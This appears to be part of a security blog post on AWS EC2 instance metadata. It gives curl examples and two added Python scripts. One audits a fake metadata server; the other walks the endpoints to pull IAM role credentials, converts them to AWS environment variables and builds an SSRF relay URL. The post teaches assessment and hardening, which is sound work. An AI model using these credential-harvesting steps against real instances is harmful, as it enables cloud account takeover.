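To see what a process running on an instance (or a server-side request forgery routed through it) can obtain from the categories in the table, here is an added Python example that is not part of the post: it audits the end-point and reports whether a role's temporary credentials are reachable and whether the user data contains strings that look like secrets, the very thing the documentation quoted above warns against. Because the real end-point only answers from inside an instance, the example embeds a small fake metadata server on 127.0.0.1 with constructed responses (role name, key ids and user data are placeholders); on a real instance, pass <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">http://169.254.169.254</span> as the base URL instead.</div>

```python
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import ProxyHandler, build_opener

# Constructed responses for the metadata paths listed in the table above.
# Role name, key ids and user data are made-up placeholders.
FAKE_METADATA = {
    "/latest/meta-data/ami-id": "ami-00000000",
    "/latest/meta-data/iam/security-credentials/": "example-role",
    "/latest/meta-data/iam/security-credentials/example-role": json.dumps({
        "Code": "Success", "Type": "AWS-HMAC",
        "AccessKeyId": "ASIA-PLACEHOLDER",
        "SecretAccessKey": "placeholder-secret",
        "Token": "placeholder-session-token",
        "Expiration": "2018-09-18T12:00:00Z"}),
    "/latest/user-data": "#!/bin/bash\nexport DB_PASSWORD=example-only\napt-get -y install nginx\n",
}


class _FakeImds(BaseHTTPRequestHandler):
    """Minimal stand-in for the metadata end-point, bound to 127.0.0.1."""

    def do_GET(self):
        body = FAKE_METADATA.get(self.path)
        if body is None:                 # the real end-point answers 404 for absent categories
            self.send_response(404)
            self.end_headers()
            return
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):        # keep the example output quiet
        pass


def start_fake_imds():
    """Start the fake server on an ephemeral port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), _FakeImds)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


# Bypass any http_proxy setting: the link-local address is never proxied.
_OPENER = build_opener(ProxyHandler({}))


def fetch(base, path, timeout=2):
    """GET base+path; None when the category is absent (HTTP 404)."""
    try:
        with _OPENER.open(base + path, timeout=timeout) as resp:
            return resp.read().decode()
    except HTTPError:
        return None


# Substrings suggesting a secret was put in user data despite the documentation.
SECRET_HINTS = ("password", "passwd", "secret", "token", "api_key", "apikey")


def audit_metadata(base):
    """Report what any process on the instance can read from the end-point."""
    result = {"ami_id": fetch(base, "/latest/meta-data/ami-id"),
              "role": None, "role_credentials_exposed": False,
              "user_data_secret_hints": []}
    role = fetch(base, "/latest/meta-data/iam/security-credentials/")
    if role:
        result["role"] = role.strip()
        creds = fetch(base, "/latest/meta-data/iam/security-credentials/" + result["role"])
        if creds:
            result["role_credentials_exposed"] = "SecretAccessKey" in json.loads(creds)
    user_data = fetch(base, "/latest/user-data")
    if user_data:
        result["user_data_secret_hints"] = [
            line.strip() for line in user_data.splitlines()
            if any(hint in line.lower() for hint in SECRET_HINTS)]
    return result


def run_against_fake():
    """Convenience wrapper: audit the embedded fake server and shut it down."""
    srv, base = start_fake_imds()
    try:
        return audit_metadata(base), fetch(base, "/latest/meta-data/does-not-exist")
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    found, _ = run_against_fake()       # on a real instance: audit_metadata("http://169.254.169.254")
    print(json.dumps(found, indent=2))
```

A true <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">role_credentials_exposed</span> means that any code execution or SSRF on the instance yields the role's temporary keys, so the role's permissions should be the minimum the instance needs; a non-empty <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">user_data_secret_hints</span> list is a finding to fix by moving the secret out of user data.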
Usage examples are given in the following:<br />
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1) # </span><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">curl </span><span style="background-color: transparent; color: #1155cc; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;"><a href="http://169.254.169.254/latest/meta-data/ami-id" style="text-decoration: none;">http://169.254.169.254/latest/meta-data/ami-id</a></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Result: </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ami-336b4456</span><br />
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">2) # curl </span><span style="background-color: transparent; color: #1155cc; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;"><a href="http://169.254.169.254/latest/meta-data/iam/security-credentials/" style="text-decoration: none;">http://169.254.169.254/latest/meta-data/iam/security-credentials/</a></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Result: </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">IAM_TEST_S3_READ</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">3) # curl </span><span style="background-color: transparent; color: #1155cc; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;"><a href="http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_TEST_S3_READ" style="text-decoration: none;">http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_TEST_S3_READ</a></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Result: </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">{</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> "Code" : "Success",</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> "LastUpdated" : "2018-08-27T15:23:14Z",</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> "Type" : "AWS-HMAC",</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> "AccessKeyId" : "AS[REDACTED]TEM",</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> "SecretAccessKey" : "EgKirlp[REDACTED]hkYp",</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> "Token" : "FQoGZXIvYXdzEJH//////////wE[REDACTED]=",</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> "Expiration" : "2018-08-27T21:36:24Z"</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">}</span><br />
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">4) # curl </span><span style="background-color: transparent; color: #1155cc; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;"><a href="http://169.254.169.254/latest/user-data" style="text-decoration: none;">http://169.254.169.254/latest/user-data</a></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Result:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">#!/bin/bash -xe</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sudo apt-get update</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># install coturn</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">apt-get install -y coturn</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># install kms</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sudo apt-get update</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sudo apt-get install -y wget</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">echo "deb http://ubuntu.kurento.org xenial kms6" | sudo tee /etc/apt/sources.list.d/kurento.list</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">wget -O - http://ubuntu.kurento.org/kurento.gpg.key | sudo apt-key add -</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sudo apt-get update </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sudo apt-get install -y kurento-media-server-6.0</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">systemctl enable kurento-media-server-6.0</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># enable coturn</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sudo echo TURNSERVER_ENABLED=1 > /etc/default/coturn</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># turn config file</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sudo cat >/etc/turnserver.conf<<-EOF</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">[...]</span><br />
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sudo /usr/local/bin/cfn-signal -e $? --stack arn:aws:cloudformation:us-east-2:118366151276:stack/KurentoMinded/3cbb23a0-3d77-11e8-953d-503f3157b035 --resource WaitCondition --region us-east-2</span></div>
<br />
To take advantage of such juicy information, the attacker has to find a way to issue requests to <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">http://169.254.169.254</span> from the EC2 instance itself, because the metadata service is link-local and only answers the instance it belongs to. There are several ways to accomplish this: a Server Side Request Forgery (SSRF) vulnerability in an application hosted on the instance, an open or misconfigured proxy running on the instance, or DNS rebinding as described by <a href="https://labs.mwrinfosecurity.com/blog/from-http-referer-to-aws-security-credentials/" target="_blank">Alexandre Kaskasoli</a>. Note that the IAM credentials obtained this way are temporary STS credentials: the <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Token</span> value must be supplied as the session token together with the access key and secret key, and they stop working at the <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Expiration</span> time.<br />
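The four curl steps above, and the point that they have to be issued from the instance (for example through an SSRF), can be put together in a single script. The following is an added example written for this post, not the author's own code: it walks the metadata endpoints in the same order as the curl commands through a pluggable fetch function, so the same logic works whether the request is sent locally or relayed through an SSRF. The canned responses are constructed from the redacted output shown above, the SSRF endpoint and its url parameter are hypothetical, and nothing here talks to a real metadata service.

```python
"""Walk the EC2 instance metadata service (IMDS) in the order of the curl
examples, through a pluggable fetch() so the identical logic runs on the
instance or through an SSRF relay.  Added example; canned_fetch, ssrf_url and
the canned responses are constructed for this illustration."""
import json
from datetime import datetime, timezone
from typing import Callable, Dict, Optional
from urllib.parse import quote

IMDS = "http://169.254.169.254"
CREDS_PATH = "/latest/meta-data/iam/security-credentials/"

# Constructed stand-in for the responses shown in the post (values redacted,
# not real credentials).  A missing key plays the role of an HTTP 404.
CANNED: Dict[str, str] = {
    "/latest/meta-data/ami-id": "ami-336b4456",
    CREDS_PATH: "IAM_TEST_S3_READ",
    CREDS_PATH + "IAM_TEST_S3_READ": json.dumps({
        "Code": "Success",
        "LastUpdated": "2018-08-27T15:23:14Z",
        "Type": "AWS-HMAC",
        "AccessKeyId": "AS[REDACTED]TEM",
        "SecretAccessKey": "EgKirlp[REDACTED]hkYp",
        "Token": "FQoGZXIvYXdzEJH[REDACTED]=",
        "Expiration": "2018-08-27T21:36:24Z",
    }),
    "/latest/user-data": "#!/bin/bash -xe\napt-get install -y coturn\n",
}

Fetcher = Callable[[str], Optional[str]]


def canned_fetch(url: str) -> Optional[str]:
    """Replaces curl: return the canned body for an IMDS URL, None for 404."""
    if not url.startswith(IMDS):
        raise ValueError("not an IMDS URL: " + url)
    return CANNED.get(url[len(IMDS):])


def ssrf_url(vulnerable_endpoint: str, imds_url: str) -> str:
    """Hypothetical SSRF relay: the attacker cannot reach 169.254.169.254
    directly, so the IMDS URL is handed to a server-side fetch parameter.
    The endpoint and the 'url' parameter name are assumptions."""
    return vulnerable_endpoint + "?url=" + quote(imds_url, safe="")


def parse_utc(stamp: str) -> datetime:
    """IMDS timestamps look like 2018-08-27T21:36:24Z (UTC)."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def credentials_valid(creds: dict, now: datetime) -> bool:
    """Role credentials are short-lived STS credentials: check Expiration
    before trying to use them."""
    return creds.get("Code") == "Success" and parse_utc(creds["Expiration"]) > now


def as_aws_env(creds: dict) -> Dict[str, str]:
    """Map the IMDS JSON onto the variables the AWS CLI and SDKs read.  The
    session token is mandatory: an instance role's access key and secret key
    are rejected by AWS without the matching AWS_SESSION_TOKEN."""
    return {
        "AWS_ACCESS_KEY_ID": creds["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": creds["SecretAccessKey"],
        "AWS_SESSION_TOKEN": creds["Token"],
    }


def dump_imds(fetch: Fetcher) -> dict:
    """Steps 1-4 of the post: AMI id, role name, role credentials, user data."""
    found: dict = {"ami_id": None, "role": None, "credentials": None, "user_data": None}
    found["ami_id"] = fetch(IMDS + "/latest/meta-data/ami-id")      # step 1
    role = fetch(IMDS + CREDS_PATH)                                   # step 2: 404 means no role
    if role and role.strip():
        found["role"] = role.strip()
        body = fetch(IMDS + CREDS_PATH + found["role"])               # step 3
        found["credentials"] = json.loads(body) if body else None
    found["user_data"] = fetch(IMDS + "/latest/user-data")            # step 4
    return found


if __name__ == "__main__":
    result = dump_imds(canned_fetch)
    print(json.dumps(result, indent=2))
    if result["credentials"]:
        print(as_aws_env(result["credentials"]))
    # What the attacker would actually request when relaying through an SSRF:
    print(ssrf_url("http://victim.example/fetch", IMDS + CREDS_PATH))
```

During a real assessment the fetch function is whatever primitive was found (an SSRF parameter, an open proxy, a DNS-rebinding victim); the rest stays the same. One caveat the script makes visible: every request is a plain GET with no headers, which is exactly what the later IMDSv2 hardening blocks, since it requires a session token obtained with a PUT to /latest/api/token and sent back in an X-aws-ec2-metadata-token header on each read, so an instance enforcing IMDSv2 answers these GETs with 401.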
<br />
<h2>
Conclusion of Part 2</h2>
<div>
AWS EC2 is undeniably a powerful service that many companies take advantage of. As described above, the security of each EC2 instance is crucial to keeping a company safe from attackers: a single exposed instance can leak the temporary credentials of its IAM role and the secrets embedded in its user data. This post wrapped up the main security issues related to AWS EC2 instances and how security experts can test for them during an assessment.</div>
<style type="text/css">
td {
border: 1px solid;
padding:5px;
}
table{
border-collapse: collapse;
}
</style>
Federico De Meohttp://www.blogger.com/profile/13823957133316817764noreply@blogger.com0